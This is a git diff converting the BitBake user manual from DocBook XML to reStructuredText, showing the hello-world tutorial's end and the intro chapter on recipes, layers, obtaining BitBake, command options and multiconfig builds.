-       File "/home/scott-lenovo/bitbake/lib/bb/parse/parse_py/ConfHandler.py", line 100, in include
-         raise ParseError("Could not %(error_out)s file %(fn)s" % vars(), oldfn, lineno)
-     ParseError: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
-
-     ERROR: Unable to parse base: ParseError in configuration INHERITs: Could not inherit file classes/base.bbclass
-                </literallayout>
-                In the sample output, BitBake could not find the
-                <filename>classes/base.bbclass</filename> file.
-                You need to create that file next.
-                </para></listitem>
-            <listitem><para><emphasis>Creating <filename>classes/base.bbclass</filename>:</emphasis>
-                BitBake uses class files to provide common code and functionality.
-                The minimally required class for BitBake is the
-                <filename>classes/base.bbclass</filename> file.
-                The <filename>base</filename> class is implicitly inherited by
-                every recipe.
-                BitBake looks for the class in the <filename>classes</filename>
-                directory of the project (i.e <filename>hello/classes</filename>
-                in this example).
-                </para>
-                <para>Create the <filename>classes</filename> directory as follows:
-                <literallayout class='monospaced'>
-     $ cd $HOME/hello
-     $ mkdir classes
-                </literallayout>
-                Move to the <filename>classes</filename> directory and then
-                create the <filename>base.bbclass</filename> file by inserting
-                this single line:
-                <literallayout class='monospaced'>
-     addtask build
-                </literallayout>
-                The minimal task that BitBake runs is the
-                <filename>do_build</filename> task.
-                This is all the example needs in order to build the project.
-                Of course, the <filename>base.bbclass</filename> can have much
-                more depending on which build environments BitBake is
-                supporting.
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake:</emphasis>
-                After making sure that the <filename>classes/base.bbclass</filename>
-                file exists, you can run the <filename>bitbake</filename>
-                command again:
-                <literallayout class='monospaced'>
-     $ bitbake
-     Nothing to do.  Use 'bitbake world' to build everything, or run 'bitbake --help' for usage information.
-                </literallayout>
-                BitBake is finally reporting no errors.
-                However, you can see that it really does not have anything
-                to do.
-                You need to create a recipe that gives BitBake something to do.
-                </para></listitem>
-            <listitem><para><emphasis>Creating a Layer:</emphasis>
-                While it is not really necessary for such a small example,
-                it is good practice to create a layer in which to keep your
-                code separate from the general metadata used by BitBake.
-                Thus, this example creates and uses a layer called "mylayer".
-                <note>
-                    You can find additional information on layers in the
-                    "<link linkend='layers'>Layers</link>" section.
-                </note></para>
-
-                <para>Minimally, you need a recipe file and a layer configuration
-                file in your layer.
-                The configuration file needs to be in the <filename>conf</filename>
-                directory inside the layer.
-                Use these commands to set up the layer and the <filename>conf</filename>
-                directory:
-                <literallayout class='monospaced'>
-     $ cd $HOME
-     $ mkdir mylayer
-     $ cd mylayer
-     $ mkdir conf
-                </literallayout>
-                Move to the <filename>conf</filename> directory and create a
-                <filename>layer.conf</filename> file that has the following:
-                <literallayout class='monospaced'>
-     BBPATH .= ":${<link linkend='var-bb-LAYERDIR'>LAYERDIR</link>}"
-
-     <link linkend='var-bb-BBFILES'>BBFILES</link> += "${LAYERDIR}/*.bb"
-
-     <link linkend='var-bb-BBFILE_COLLECTIONS'>BBFILE_COLLECTIONS</link> += "mylayer"
-     <link linkend='var-bb-BBFILE_PATTERN'>BBFILE_PATTERN_mylayer</link> := "^${LAYERDIR_RE}/"
-                </literallayout>
-                For information on these variables, click the links
-                to go to the definitions in the glossary.</para>
-                <para>You need to create the recipe file next.
-                Inside your layer at the top-level, use an editor and create
-                a recipe file named <filename>printhello.bb</filename> that
-                has the following:
-                <literallayout class='monospaced'>
-     <link linkend='var-bb-DESCRIPTION'>DESCRIPTION</link> = "Prints Hello World"
-     <link linkend='var-bb-PN'>PN</link> = 'printhello'
-     <link linkend='var-bb-PV'>PV</link> = '1'
-
-     python do_build() {
-        bb.plain("********************");
-        bb.plain("*                  *");
-        bb.plain("*  Hello, World!   *");
-        bb.plain("*                  *");
-        bb.plain("********************");
-     }
-                </literallayout>
-                The recipe file simply provides a description of the
-                recipe, the name, version, and the <filename>do_build</filename>
-                task, which prints out "Hello World" to the console.
-                For more information on these variables, follow the links
-                to the glossary.
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake With a Target:</emphasis>
-                Now that a BitBake target exists, run the command and provide
-                that target:
-                <literallayout class='monospaced'>
-     $ cd $HOME/hello
-     $ bitbake printhello
-     ERROR: no recipe files to build, check your BBPATH and BBFILES?
-
-     Summary: There was 1 ERROR message shown, returning a non-zero exit code.
-                </literallayout>
-                We have created the layer with the recipe and the layer
-                configuration file but it still seems that BitBake cannot
-                find the recipe.
-                BitBake needs a <filename>conf/bblayers.conf</filename> that
-                lists the layers for the project.
-                Without this file, BitBake cannot find the recipe.
-                </para></listitem>
-            <listitem><para><emphasis>Creating <filename>conf/bblayers.conf</filename>:</emphasis>
-                BitBake uses the <filename>conf/bblayers.conf</filename> file
-                to locate layers needed for the project.
-                This file must reside in the <filename>conf</filename> directory
-                of the project (i.e. <filename>hello/conf</filename> for this
-                example).</para>
-                <para>Set your working directory to the <filename>hello/conf</filename>
-                directory and then create the <filename>bblayers.conf</filename>
-                file so that it contains the following:
-                <literallayout class='monospaced'>
-     BBLAYERS ?= " \
-       /home/&lt;you&gt;/mylayer \
-       "
-                </literallayout>
-                You need to provide your own information for
-                <filename>you</filename> in the file.
-                </para></listitem>
-            <listitem><para><emphasis>Run BitBake With a Target:</emphasis>
-                Now that you have supplied the <filename>bblayers.conf</filename>
-                file, run the <filename>bitbake</filename> command and provide
-                the target:
-                <literallayout class='monospaced'>
-     $ bitbake printhello
-     Parsing recipes: 100% |##################################################################################|
-     Time: 00:00:00
-     Parsing of 1 .bb files complete (0 cached, 1 parsed). 1 targets, 0 skipped, 0 masked, 0 errors.
-     NOTE: Resolving any missing task queue dependencies
-     NOTE: Preparing RunQueue
-     NOTE: Executing RunQueue Tasks
-     ********************
-     *                  *
-     *  Hello, World!   *
-     *                  *
-     ********************
-     NOTE: Tasks Summary: Attempted 1 tasks of which 0 didn't need to be rerun and all succeeded.
-                </literallayout>
-                BitBake finds the <filename>printhello</filename> recipe and
-                successfully runs the task.
-                <note>
-                    After the first execution, re-running
-                    <filename>bitbake printhello</filename> again will not
-                    result in a BitBake run that prints the same console
-                    output.
-                    The reason for this is that the first time the
-                    <filename>printhello.bb</filename> recipe's
-                    <filename>do_build</filename> task executes
-                    successfully, BitBake writes a stamp file for the task.
-                    Thus, the next time you attempt to run the task
-                    using that same <filename>bitbake</filename> command,
-                    BitBake notices the stamp and therefore determines
-                    that the task does not need to be re-run.
-                    If you delete the <filename>tmp</filename> directory
-                    or run <filename>bitbake -c clean printhello</filename>
-                    and then re-run the build, the "Hello, World!" message will
-                    be printed again.
-                </note>
-                </para></listitem>
-        </orderedlist>
-    </section>
-</appendix>
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst
new file mode 100644
index 0000000000..6f9d392935
--- /dev/null
+++ b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.rst
@@ -0,0 +1,651 @@
+.. SPDX-License-Identifier: CC-BY-2.5
+
+========
+Overview
+========
+
+|
+
+Welcome to the BitBake User Manual. This manual provides information on
+the BitBake tool. The information attempts to be as independent as
+possible regarding systems that use BitBake, such as OpenEmbedded and
+the Yocto Project. In some cases, scenarios or examples within the
+context of a build system are used in the manual to help with
+understanding. For these cases, the manual clearly states the context.
+
+.. _intro:
+
+Introduction
+============
+
+Fundamentally, BitBake is a generic task execution engine that allows
+shell and Python tasks to be run efficiently and in parallel while
+working within complex inter-task dependency constraints. One of
+BitBake's main users, OpenEmbedded, takes this core and builds embedded
+Linux software stacks using a task-oriented approach.
+
+Conceptually, BitBake is similar to GNU Make in some regards but has
+significant differences:
+
+-  BitBake executes tasks according to provided metadata that builds up
+   the tasks. Metadata is stored in recipe (``.bb``) and related recipe
+   "append" (``.bbappend``) files, configuration (``.conf``) and
+   underlying include (``.inc``) files, and in class (``.bbclass``)
+   files. The metadata provides BitBake with instructions on what tasks
+   to run and the dependencies between those tasks.
+
+-  BitBake includes a fetcher library for obtaining source code from
+   various places such as local files, source control systems, or
+   websites.
+
+-  The instructions for each unit to be built (e.g. a piece of software)
+   are known as "recipe" files and contain all the information about the
+   unit (dependencies, source file locations, checksums, description and
+   so on).
+
+-  BitBake includes a client/server abstraction and can be used from a
+   command line or used as a service over XML-RPC and has several
+   different user interfaces.
+
+History and Goals
+=================
+
+BitBake was originally a part of the OpenEmbedded project. It was
+inspired by the Portage package management system used by the Gentoo
+Linux distribution. On December 7, 2004, OpenEmbedded project team
+member Chris Larson split the project into two distinct pieces:
+
+-  BitBake, a generic task executor
+
+-  OpenEmbedded, a metadata set utilized by BitBake
+
+Today, BitBake is the primary basis of the
+`OpenEmbedded <http://www.openembedded.org/>`__ project, which is being
+used to build and maintain Linux distributions such as the `Angstrom
+Distribution <http://www.angstrom-distribution.org/>`__, and which is
+also being used as the build tool for Linux projects such as the `Yocto
+Project <http://www.yoctoproject.org>`__.
+
+Prior to BitBake, no other build tool adequately met the needs of an
+aspiring embedded Linux distribution. All of the build systems used by
+traditional desktop Linux distributions lacked important functionality,
+and none of the ad hoc Buildroot-based systems, prevalent in the
+embedded space, were scalable or maintainable.
+
+Some important original goals for BitBake were:
+
+-  Handle cross-compilation.
+
+-  Handle inter-package dependencies (build time on target architecture,
+   build time on native architecture, and runtime).
+
+-  Support running any number of tasks within a given package,
+   including, but not limited to, fetching upstream sources, unpacking
+   them, patching them, configuring them, and so forth.
+
+-  Be Linux distribution agnostic for both build and target systems.
+
+-  Be architecture agnostic.
+
+-  Support multiple build and target operating systems (e.g. Cygwin, the
+   BSDs, and so forth).
+
+-  Be self-contained, rather than tightly integrated into the build
+   machine's root filesystem.
+
+-  Handle conditional metadata on the target architecture, operating
+   system, distribution, and machine.
+
+-  Be easy to use the tools to supply local metadata and packages
+   against which to operate.
+
+-  Be easy to use BitBake to collaborate between multiple projects for
+   their builds.
+
+-  Provide an inheritance mechanism to share common metadata between
+   many packages.
+
+Over time it became apparent that some further requirements were
+necessary:
+
+-  Handle variants of a base recipe (e.g. native, sdk, and multilib).
+
+-  Split metadata into layers and allow layers to enhance or override
+   other layers.
+
+-  Allow representation of a given set of input variables to a task as a
+   checksum. Based on that checksum, allow acceleration of builds with
+   prebuilt components.
+
+BitBake satisfies all the original requirements and many more with
+extensions being made to the basic functionality to reflect the
+additional requirements. Flexibility and power have always been the
+priorities. BitBake is highly extensible and supports embedded Python
+code and execution of any arbitrary tasks.
+
+.. _Concepts:
+
+Concepts
+========
+
+BitBake is a program written in the Python language. At the highest
+level, BitBake interprets metadata, decides what tasks are required to
+run, and executes those tasks. Similar to GNU Make, BitBake controls how
+software is built. GNU Make achieves its control through "makefiles",
+while BitBake uses "recipes".
+
+BitBake extends the capabilities of a simple tool like GNU Make by
+allowing for the definition of much more complex tasks, such as
+assembling entire embedded Linux distributions.
+
+The remainder of this section introduces several concepts that should be
+understood in order to better leverage the power of BitBake.
+
+Recipes
+-------
+
+BitBake Recipes, which are denoted by the file extension ``.bb``, are
+the most basic metadata files. These recipe files provide BitBake with
+the following:
+
+-  Descriptive information about the package (author, homepage, license,
+   and so on)
+
+-  The version of the recipe
+
+-  Existing dependencies (both build and runtime dependencies)
+
+-  Where the source code resides and how to fetch it
+
+-  Whether the source code requires any patches, where to find them, and
+   how to apply them
+
+-  How to configure and compile the source code
+
+-  How to assemble the generated artifacts into one or more installable
+   packages
+
+-  Where on the target machine to install the package or packages
+   created
+
+Within the context of BitBake, or any project utilizing BitBake as its
+build system, files with the ``.bb`` extension are referred to as
+recipes.
+
+.. note::
+
+   The term "package" is also commonly used to describe recipes.
+   However, since the same word is used to describe packaged output from
+   a project, it is best to maintain a single descriptive term -
+   "recipes". Put another way, a single "recipe" file is quite capable
+   of generating a number of related but separately installable
+   "packages". In fact, that ability is fairly common.
+
+Configuration Files
+-------------------
+
+Configuration files, which are denoted by the ``.conf`` extension,
+define various configuration variables that govern the project's build
+process. These files fall into several areas that define machine
+configuration, distribution configuration, possible compiler tuning,
+general common configuration, and user configuration. The main
+configuration file is the sample ``bitbake.conf`` file, which is located
+within the BitBake source tree ``conf`` directory.
+
+Classes
+-------
+
+Class files, which are denoted by the ``.bbclass`` extension, contain
+information that is useful to share between metadata files. The BitBake
+source tree currently comes with one class metadata file called
+``base.bbclass``. You can find this file in the ``classes`` directory.
+The ``base.bbclass`` class files is special since it is always included
+automatically for all recipes and classes. This class contains
+definitions for standard basic tasks such as fetching, unpacking,
+configuring (empty by default), compiling (runs any Makefile present),
+installing (empty by default) and packaging (empty by default). These
+tasks are often overridden or extended by other classes added during the
+project development process.
+
+Layers
+------
+
+Layers allow you to isolate different types of customizations from each
+other. While you might find it tempting to keep everything in one layer
+when working on a single project, the more modular your metadata, the
+easier it is to cope with future changes.
+
+To illustrate how you can use layers to keep things modular, consider
+customizations you might make to support a specific target machine.
+These types of customizations typically reside in a special layer,
+rather than a general layer, called a Board Support Package (BSP) layer.
+Furthermore, the machine customizations should be isolated from recipes
+and metadata that support a new GUI environment, for example. This
+situation gives you a couple of layers: one for the machine
+configurations and one for the GUI environment. It is important to
+understand, however, that the BSP layer can still make machine-specific
+additions to recipes within the GUI environment layer without polluting
+the GUI layer itself with those machine-specific changes. You can
+accomplish this through a recipe that is a BitBake append
+(``.bbappend``) file.
+
+.. _append-bbappend-files:
+
+Append Files
+------------
+
+Append files, which are files that have the ``.bbappend`` file
+extension, extend or override information in an existing recipe file.
+
+BitBake expects every append file to have a corresponding recipe file.
+Furthermore, the append file and corresponding recipe file must use the
+same root filename. The filenames can differ only in the file type
+suffix used (e.g. ``formfactor_0.0.bb`` and
+``formfactor_0.0.bbappend``).
+
+Information in append files extends or overrides the information in the
+underlying, similarly-named recipe files.
+
+When you name an append file, you can use the "``%``" wildcard character
+to allow for matching recipe names. For example, suppose you have an
+append file named as follows: ::
+
+  busybox_1.21.%.bbappend
+
+That append file
+would match any ``busybox_1.21.``\ x\ ``.bb`` version of the recipe. So,
+the append file would match the following recipe names: ::
+
+  busybox_1.21.1.bb
+  busybox_1.21.2.bb
+  busybox_1.21.3.bb
+
+.. note::
+
+   The use of the " % " character is limited in that it only works directly in
+   front of the .bbappend portion of the append file's name. You cannot use the
+   wildcard character in any other location of the name.
+
+If the ``busybox`` recipe was updated to ``busybox_1.3.0.bb``, the
+append name would not match. However, if you named the append file
+``busybox_1.%.bbappend``, then you would have a match.
+
+In the most general case, you could name the append file something as
+simple as ``busybox_%.bbappend`` to be entirely version independent.
+
+Obtaining BitBake
+=================
+
+You can obtain BitBake several different ways:
+
+-  **Cloning BitBake:** Using Git to clone the BitBake source code
+   repository is the recommended method for obtaining BitBake. Cloning
+   the repository makes it easy to get bug fixes and have access to
+   stable branches and the master branch. Once you have cloned BitBake,
+   you should use the latest stable branch for development since the
+   master branch is for BitBake development and might contain less
+   stable changes.
+
+   You usually need a version of BitBake that matches the metadata you
+   are using. The metadata is generally backwards compatible but not
+   forward compatible.
+
+   Here is an example that clones the BitBake repository: ::
+
+     $ git clone git://git.openembedded.org/bitbake
+
+   This command clones the BitBake
+   Git repository into a directory called ``bitbake``. Alternatively,
+   you can designate a directory after the ``git clone`` command if you
+   want to call the new directory something other than ``bitbake``. Here
+   is an example that names the directory ``bbdev``: ::
+
+     $ git clone git://git.openembedded.org/bitbake bbdev
+
+-  **Installation using your Distribution Package Management System:**
+   This method is not recommended because the BitBake version that is
+   provided by your distribution, in most cases, is several releases
+   behind a snapshot of the BitBake repository.
+
+-  **Taking a snapshot of BitBake:** Downloading a snapshot of BitBake
+   from the source code repository gives you access to a known branch or
+   release of BitBake.
+
+      .. note::
+
+         Cloning the Git repository, as described earlier, is the preferred
+         method for getting BitBake. Cloning the repository makes it easier
+         to update as patches are added to the stable branches.
+
+   The following example downloads a snapshot of BitBake version 1.17.0: ::
+
+     $ wget http://git.openembedded.org/bitbake/snapshot/bitbake-1.17.0.tar.gz
+     $ tar zxpvf bitbake-1.17.0.tar.gz
+
+   After extraction of the tarball using
+   the tar utility, you have a directory entitled ``bitbake-1.17.0``.
+
+-  **Using the BitBake that Comes With Your Build Checkout:** A final
+   possibility for getting a copy of BitBake is that it already comes
+   with your checkout of a larger BitBake-based build system, such as
+   Poky. Rather than manually checking out individual layers and gluing
+   them together yourself, you can check out an entire build system. The
+   checkout will already include a version of BitBake that has been
+   thoroughly tested for compatibility with the other components. For
+   information on how to check out a particular BitBake-based build
+   system, consult that build system's supporting documentation.
+
+.. _bitbake-user-manual-command:
+
+The BitBake Command
+===================
+
+The ``bitbake`` command is the primary interface to the BitBake tool.
+This section presents the BitBake command syntax and provides several
+execution examples.
+
+Usage and syntax
+----------------
+
+Following is the usage and syntax for BitBake: ::
+
+   $ bitbake -h
+   Usage: bitbake [options] [recipename/target recipe:do_task ...]
+
+       Executes the specified task (default is 'build') for a given set of target recipes (.bb files).
+       It is assumed there is a conf/bblayers.conf available in cwd or in BBPATH which
+       will provide the layer, BBFILES and other configuration information.
+
+   Options:
+     --version             show program's version number and exit
+     -h, --help            show this help message and exit
+     -b BUILDFILE, --buildfile=BUILDFILE
+                           Execute tasks from a specific .bb recipe directly.
+                           WARNING: Does not handle any dependencies from other
+                           recipes.
+     -k, --continue        Continue as much as possible after an error. While the
+                           target that failed and anything depending on it cannot
+                           be built, as much as possible will be built before
+                           stopping.
+     -f, --force           Force the specified targets/task to run (invalidating
+                           any existing stamp file).
+     -c CMD, --cmd=CMD     Specify the task to execute. The exact options
+                           available depend on the metadata. Some examples might
+                           be 'compile' or 'populate_sysroot' or 'listtasks' may
+                           give a list of the tasks available.
+     -C INVALIDATE_STAMP, --clear-stamp=INVALIDATE_STAMP
+                           Invalidate the stamp for the specified task such as
+                           'compile' and then run the default task for the
+                           specified target(s).
+     -r PREFILE, --read=PREFILE
+                           Read the specified file before bitbake.conf.
+     -R POSTFILE, --postread=POSTFILE
+                           Read the specified file after bitbake.conf.
+     -v, --verbose         Enable tracing of shell tasks (with 'set -x'). Also
+                           print bb.note(...) messages to stdout (in addition to
+                           writing them to ${T}/log.do_&lt;task&gt;).
+     -D, --debug           Increase the debug level. You can specify this more
+                           than once. -D sets the debug level to 1, where only
+                           bb.debug(1, ...) messages are printed to stdout; -DD
+                           sets the debug level to 2, where both bb.debug(1, ...)
+                           and bb.debug(2, ...) messages are printed; etc.
+                           Without -D, no debug messages are printed. Note that
+                           -D only affects output to stdout. All debug messages
+                           are written to ${T}/log.do_taskname, regardless of the
+                           debug level.
+     -q, --quiet           Output less log message data to the terminal. You can
+                           specify this more than once.
+     -n, --dry-run         Don't execute, just go through the motions.
+     -S SIGNATURE_HANDLER, --dump-signatures=SIGNATURE_HANDLER
+                           Dump out the signature construction information, with
+                           no task execution. The SIGNATURE_HANDLER parameter is
+                           passed to the handler. Two common values are none and
+                           printdiff but the handler may define more/less. none
+                           means only dump the signature, printdiff means compare
+                           the dumped signature with the cached one.
+     -p, --parse-only      Quit after parsing the BB recipes.
+     -s, --show-versions   Show current and preferred versions of all recipes.
+     -e, --environment     Show the global or per-recipe environment complete
+                           with information about where variables were
+                           set/changed.
+     -g, --graphviz        Save dependency tree information for the specified
+                           targets in the dot syntax.
+     -I EXTRA_ASSUME_PROVIDED, --ignore-deps=EXTRA_ASSUME_PROVIDED
+                           Assume these dependencies don't exist and are already
+                           provided (equivalent to ASSUME_PROVIDED). Useful to
+                           make dependency graphs more appealing
+     -l DEBUG_DOMAINS, --log-domains=DEBUG_DOMAINS
+                           Show debug logging for the specified logging domains
+     -P, --profile         Profile the command and save reports.
+     -u UI, --ui=UI        The user interface to use (knotty, ncurses or taskexp
+                           - default knotty).
+     --token=XMLRPCTOKEN   Specify the connection token to be used when
+                           connecting to a remote server.
+     --revisions-changed   Set the exit code depending on whether upstream
+                           floating revisions have changed or not.
+     --server-only         Run bitbake without a UI, only starting a server
+                           (cooker) process.
+     -B BIND, --bind=BIND  The name/address for the bitbake xmlrpc server to bind
+                           to.
+     -T SERVER_TIMEOUT, --idle-timeout=SERVER_TIMEOUT
+                           Set timeout to unload bitbake server due to
+                           inactivity, set to -1 means no unload, default:
+                           Environment variable BB_SERVER_TIMEOUT.
+     --no-setscene         Do not run any setscene tasks. sstate will be ignored
+                           and everything needed, built.
+     --setscene-only       Only run setscene tasks, don't run any real tasks.
+     --remote-server=REMOTE_SERVER
+                           Connect to the specified server.
+     -m, --kill-server     Terminate any running bitbake server.
+     --observe-only        Connect to a server as an observing-only client.
+     --status-only         Check the status of the remote bitbake server.
+     -w WRITEEVENTLOG, --write-log=WRITEEVENTLOG
+                           Writes the event log of the build to a bitbake event
+                           json file. Use '' (empty string) to assign the name
+                           automatically.
+     --runall=RUNALL       Run the specified task for any recipe in the taskgraph
+                           of the specified target (even if it wouldn't otherwise
+                           have run).
+     --runonly=RUNONLY     Run only the specified task within the taskgraph of
+                           the specified targets (and any task dependencies those
+                           tasks may have).
+
+.. _bitbake-examples:
+
+Examples
+--------
+
+This section presents some examples showing how to use BitBake.
+
+.. _example-executing-a-task-against-a-single-recipe:
+
+Executing a Task Against a Single Recipe
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Executing tasks for a single recipe file is relatively simple. You
+specify the file in question, and BitBake parses it and executes the
+specified task. If you do not specify a task, BitBake executes the
+default task, which is "build". BitBake obeys inter-task dependencies
+when doing so.
+
+The following command runs the build task, which is the default task, on
+the ``foo_1.0.bb`` recipe file: ::
+
+  $ bitbake -b foo_1.0.bb
+
+The following command runs the clean task on the ``foo.bb`` recipe file: ::
+
+  $ bitbake -b foo.bb -c clean
+
+.. note::
+
+   The "-b" option explicitly does not handle recipe dependencies. Other
+   than for debugging purposes, it is instead recommended that you use
+   the syntax presented in the next section.
+
+Executing Tasks Against a Set of Recipe Files
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+There are a number of additional complexities introduced when one wants
+to manage multiple ``.bb`` files. Clearly there needs to be a way to
+tell BitBake what files are available and, of those, which you want to
+execute. There also needs to be a way for each recipe to express its
+dependencies, both for build-time and runtime. There must be a way for
+you to express recipe preferences when multiple recipes provide the same
+functionality, or when there are multiple versions of a recipe.
+
+The ``bitbake`` command, when not using "--buildfile" or "-b" only
+accepts a "PROVIDES". You cannot provide anything else. By default, a
+recipe file generally "PROVIDES" its "packagename" as shown in the
+following example: ::
+
+  $ bitbake foo
+
+This next example "PROVIDES" the
+package name and also uses the "-c" option to tell BitBake to just
+execute the ``do_clean`` task: ::
+
+  $ bitbake -c clean foo
+
+Executing a List of Task and Recipe Combinations
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+The BitBake command line supports specifying different tasks for
+individual targets when you specify multiple targets. For example,
+suppose you had two targets (or recipes) ``myfirstrecipe`` and
+``mysecondrecipe`` and you needed BitBake to run ``taskA`` for the first
+recipe and ``taskB`` for the second recipe: ::
+
+  $ bitbake myfirstrecipe:do_taskA mysecondrecipe:do_taskB
+
+Generating Dependency Graphs
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake is able to generate dependency graphs using the ``dot`` syntax.
+You can convert these graphs into images using the ``dot`` tool from
+`Graphviz <http://www.graphviz.org>`__.
+
+When you generate a dependency graph, BitBake writes two files to the
+current working directory:
+
+-  ``task-depends.dot``: Shows dependencies between tasks. These
+   dependencies match BitBake's internal task execution list.
+
+-  ``pn-buildlist``: Shows a simple list of targets that are to be
+   built.
+
+To stop depending on common depends, use the "-I" depend option and
+BitBake omits them from the graph. Leaving this information out can
+produce more readable graphs. This way, you can remove from the graph
+``DEPENDS`` from inherited classes such as ``base.bbclass``.
+
+Here are two examples that create dependency graphs. The second example
+omits depends common in OpenEmbedded from the graph: ::
+
+  $ bitbake -g foo
+
+  $ bitbake -g -I virtual/kernel -I eglibc foo
+
+Executing a Multiple Configuration Build
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+BitBake is able to build multiple images or packages using a single
+command where the different targets require different configurations
+(multiple configuration builds). Each target, in this scenario, is
+referred to as a "multiconfig".
+
+To accomplish a multiple configuration build, you must define each
+target's configuration separately using a parallel configuration file in
+the build directory. The location for these multiconfig configuration
+files is specific. They must reside in the current build directory in a
+sub-directory of ``conf`` named ``multiconfig``. Following is an example
+for two separate targets:
+
+.. image:: figures/bb_multiconfig_files.png
+   :align: center
+
+The reason for this required file hierarchy is because the ``BBPATH``
+variable is not constructed until the layers are parsed. Consequently,
+using the configuration file as a pre-configuration file is not possible
+unless it is located in the current working directory.
+
+Minimally, each configuration file must define the machine and the
+temporary directory BitBake uses for the build. Suggested practice
+dictates that you do not overlap the temporary directories used during
+the builds.
+
+Aside from separate configuration files for each target, you must also
+enable BitBake to perform multiple configuration builds. Enabling is
+accomplished by setting the
+:term:`BBMULTICONFIG` variable in the
+``local.conf`` configuration file. As an example, suppose you had
+configuration files for ``target1`` and ``target2`` defined in the build
+directory. The following statement in the ``local.conf`` file both
+enables BitBake to perform multiple configuration builds and specifies
+the two extra multiconfigs: ::
+
+  BBMULTICONFIG = "target1 target2"
+
+Once the target configuration files are in place and BitBake has been
+enabled to perform multiple configuration builds, use the following
+command form to start the builds: ::
+
+  $ bitbake [mc:multiconfigname:]target [[[mc:multiconfigname:]target] ... ]
+
+Here is an example for two extra multiconfigs: ``target1`` and ``target2``: ::
+
+  $ bitbake mc::target mc:target1:target mc:target2:target
+
+.. _bb-enabling-multiple-configuration-build-dependencies:
+
+Enabling Multiple Configuration Build Dependencies
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Sometimes dependencies can exist between targets (multiconfigs) in a
+multiple configuration build. For example, suppose that in order to
+build an image for a particular architecture, the root filesystem of
+another build for a different architecture needs to exist. In other
+words, the image for the first multiconfig depends on the root
+filesystem of the second multiconfig. This dependency is essentially
+that the task in the recipe that builds one multiconfig is dependent on
+the completion of the task in the recipe that builds another
+multiconfig.
+
+To enable dependencies in a multiple configuration build, you must
+declare the dependencies in the recipe using the following statement
+form: ::
+
+  task_or_package[mcdepends] = "mc:from_multiconfig:to_multiconfig:recipe_name:task_on_which_to_depend"
+
+To better show how to use this statement, consider an example with two
+multiconfigs: ``target1`` and ``target2``: ::
+
+  image_task[mcdepends] = "mc:target1:target2:image2:rootfs_task"
+
+In this example, the
+``from_multiconfig`` is "target1" and the ``to_multiconfig`` is "target2". The
+task on which the image whose recipe contains image_task depends on the
+completion of the rootfs_task used to build out image2, which is
+associated with the "target2" multiconfig.
+
+Once you set up this dependency, you can build the "target1" multiconfig
+using a BitBake command as follows: ::
+
+  $ bitbake mc:target1:image1
+
+This command executes all the tasks needed to create ``image1`` for the "target1"
+multiconfig. Because of the dependency, BitBake also executes through
+the ``rootfs_task`` for the "target2" multiconfig build.
+
+Having a recipe depend on the root filesystem of another build might not
+seem that useful. Consider this change to the statement in the image1
+recipe: ::
+
+  image_task[mcdepends] = "mc:target1:target2:image2:image_task"
+
+In this case, BitBake must create ``image2`` for the "target2" build since
+the "target1" build depends on it.
+
+Because "target1" and "target2" are enabled for multiple configuration
+builds and have separate configuration files, BitBake places the
+artifacts for each build in the respective temporary build directories.
diff --git a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml b/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml
deleted file mode 100644
index 995c2fa7bf..0000000000
--- a/bitbake/doc/bitbake-user-manual/bitbake-user-manual-intro.xml
+++ /dev/null
@@ -1,891 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-    "http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd">
-
-<chapter id="bitbake-user-manual-intro">
-    <title>Overview</title>
-
-    <para>
-        Welcome to the BitBake User Manual.
-        This manual provides information on the BitBake tool.
-        The information attempts to be as independent as possible regarding
-        systems that use BitBake, such as OpenEmbedded and the
-        Yocto Project.
-        In some cases, scenarios or examples within the context of
-        a build system are used in the manual to help with understanding.
-        For these cases, the manual clearly states the context.
-    </para>
-
-    <section id="intro">
-        <title>Introduction</title>
-
-        <para>
-            Fundamentally, BitBake is a generic task execution
-            engine that allows shell and Python tasks to be run
-            efficiently and in parallel while working within
-            complex inter-task dependency constraints.
-            One of BitBake's main users, OpenEmbedded, takes this core
-            and builds embedded Linux software stacks using
-            a task-oriented approach.
-        </para>
-
-        <para>
-            Conceptually, BitBake is similar to GNU Make in
-            some regards but has significant differences:
-            <itemizedlist>
-                <listitem><para>
-                    BitBake executes tasks according to provided
-                    metadata that builds up the tasks.
-                    Metadata is stored in recipe (<filename>.bb</filename>)
-                    and related recipe "append" (<filename>.bbappend</filename>)
-                    files, configuration (<filename>.conf</filename>) and
-                    underlying include (<filename>.inc</filename>) files, and
-                    in class (<filename>.bbclass</filename>) files.
-                    The metadata provides
-                    BitBake with instructions on what tasks to run and
-                    the dependencies between those tasks.
-                    </para></listitem>
-                <listitem><para>
-                    BitBake includes a fetcher library for obtaining source
-                    code from various places such as local files, source control
-                    systems, or websites.
-                    </para></listitem>
-                <listitem><para>
-                    The instructions for each unit to be built (e.g. a piece
-                    of software) are known as "recipe" files and
-                    contain all the information about the unit
-                    (dependencies, source file locations, checksums, description
-                    and so on).
-                    </para></listitem>
-                <listitem><para>
-                    BitBake includes a client/server abstraction and can
-                    be used from a command line or used as a service over
-                    XML-RPC and has several different user interfaces.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-    </section>
-
-    <section id="history-and-goals">
-        <title>History and Goals</title>
-
-        <para>
-            BitBake was originally a part of the OpenEmbedded project.
-            It was inspired by the Portage package management system
-            used by the Gentoo Linux distribution.
-            On December 7, 2004, OpenEmbedded project team member
-            Chris Larson split the project into two distinct pieces:
-            <itemizedlist>
-                <listitem><para>BitBake, a generic task executor</para></listitem>
